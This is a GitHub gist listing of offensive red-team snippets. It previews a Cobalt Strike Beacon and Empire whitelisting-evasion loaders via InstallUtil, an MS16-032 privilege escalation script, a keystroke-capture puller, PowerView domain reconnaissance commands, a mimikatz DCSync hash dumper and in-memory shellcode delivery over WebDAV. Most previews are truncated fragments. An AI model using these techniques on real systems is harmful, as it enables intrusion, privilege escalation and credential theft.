Skip to content

Instantly share code, notes, and snippets.

@vysecurity
vysecurity / beaconPayload.cs
Created January 28, 2016 13:41
Application Whitelisting Evasion for Cobalt Strike - Beacon Payload
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@vysecurity
vysecurity / empire.cs
Created April 6, 2016 02:12
PowerShell Empire via InstallUtil.exe
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
@vysecurity
vysecurity / ms16-032.cna
Created September 28, 2016 23:21 — forked from rsmudge/ms16-032.cna
Quick and dirty script to integrate ms16-032 into Cobalt Strike and its workflows.
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
#
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack
# logic to run this particular attack
sub exploit {
@vysecurity
vysecurity / webkeystrokes.cna
Created September 28, 2016 23:21 — forked from rsmudge/webkeystrokes.cna
Shows how to pull keystrokes captured by website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.
# convert comma separated keystroke values into a string.
sub toString {
local('@temp');
@temp = split(",", $1);
shift(@temp);
return join("", map({
return chr(parseNumber($1, 16, 10));
}, @temp));
}
@vysecurity
vysecurity / getpidany.cna
Created September 28, 2016 23:22 — forked from rsmudge/getpidany.cna
Get PID of Any Process
# getexplorerpid($bid, &callback);
sub getanypid {
bps($1, lambda({
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $pid) = split("\\s+", $entry);
if ($name eq $proc) {
# $1 is our Beacon ID, $pid is the PID of $proc
[$callback: $1, $proc, $pid];
}
@vysecurity
vysecurity / gist:702a165b23b2a290859e179bad3f4a18
Created May 27, 2017 03:02 — forked from pcting/gist:1041387
SSH Tunnel UDP Packets from REMOTE server
# YOUR LOCAL BOX
socat -t0 -T0 tcp4-listen:6667,reuseaddr,fork UDP:localhost:4445
ssh user@remote_server -R 6667:localhost:6667
# REMOTE MACHINE
socat -t0 -T0 udp4-recvfrom:4445,reuseaddr,fork tcp:localhost:6667
@vysecurity
vysecurity / PowerView-2.0-tricks.ps1
Created June 17, 2017 22:19 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to
@vysecurity
vysecurity / PowerView-3.0-tricks.ps1
Created June 18, 2017 08:48 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
# Add : add a new object to a destination
# Set : modify a given object
# Invoke : lazy catch-all
@vysecurity
vysecurity / Invoke-DCSync.ps1
Created August 15, 2017 20:45 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
@vysecurity
vysecurity / Invoke-WebDavDelivery.ps1
Created September 11, 2017 14:19
Payload delivery using WebDAV PROPFIND only covert channel
function Invoke-WebDavDelivery
{
<#
.SYNOPSIS
Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it.
This script requires its server side counterpart (webdavdelivery.py) to communicate with and actually deliver the payload data.
Function: Invoke-WebDavDelivery
Author: Arno0x0x, Twitter: @Arno0x0x